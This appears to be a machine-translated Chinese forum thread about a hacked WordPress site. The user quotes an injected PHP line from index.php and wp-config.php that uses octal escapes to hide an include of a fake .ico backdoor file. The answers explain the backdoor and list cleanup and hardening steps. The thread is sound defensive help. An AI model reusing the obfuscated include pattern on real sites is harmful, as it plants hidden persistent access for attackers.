Wordpress网站被黑了？

Question

看起来我的wordpress网站被黑了。下面的代码片段出现在index.php中，wp-config.php

<?php
/*6b9bb*/

@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";

/*6b9bb*/

我改变了：

1. WP管理URL和放置强密码用户名
2. 用强密码更改cpanel/FTP密码
3. 实现的iTheme安全
4. 更新Wordpress到最新(主题和插件)

然而，代码再次重复。什么是好的解决方案？

附注：我在使用场址。

谢谢

Answer 1

是的，有人正在包括一个.ico文件(用文本编辑器打开它，您会看到它是一些php代码，没有真正的ico文件)

/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

尽管你改变了你的主机和密码你黑客可以进入，一旦他们在他们可以设置各种后门以保持访问，他们的任何.php文件都可以做到这一点。此时，关闭他们最初使用的前门是你唯一的职业。

遵循本文中的建议：hacked，然后：WordPress

下面是一些关于后门的链接：http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/

来源：https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

Answer 2

一旦网站被黑，在我看来，抵抗是徒劳的。任何扫描或工具都不会帮助你。您必须用新的下载来替换所有的文件。大多数情况下，它是直接的：

• 备份整个安装(以防万一)
  • 下载完整的wp内容/上载文件夹
  • 使用当前活动的插件制作屏幕快照或保存页面
  • 删除所有文件
  • 获取一个新的wordpress设置并解压它
  • 下载您的主题和子主题的新副本(重新创建以前的设置)
  • 将前面的wp-config.php复制到这个新安装中。但是好好看一看。通常它也有一些病毒/后门在里面。通常很容易看到和移除。现在你已经和你的数据库连接了
  • 检查保存的上传文件夹中不应该存在的文件，比如php文件。然后将其上传到新文件夹。
  • 重新安装所有插件，重新下载

​

Answer 3

我也面临着这个问题，并且一步一步地完成了以下步骤：

• 手动清除注入代码
• 更改所有密码
• 隐藏WP管理仪表板URL
• 限制登录尝试
• 安装安全插件(Sucuri，Wordfence安全性)
• 与Sucuri计划签约好的是安装Wordfence安全插件，运行扫描，然后你会发现所有的文件与注入的代码，你可以清理注入的代码。您也可以访问此链接https://naderzad.info/web-development/wordpress-code-injection/。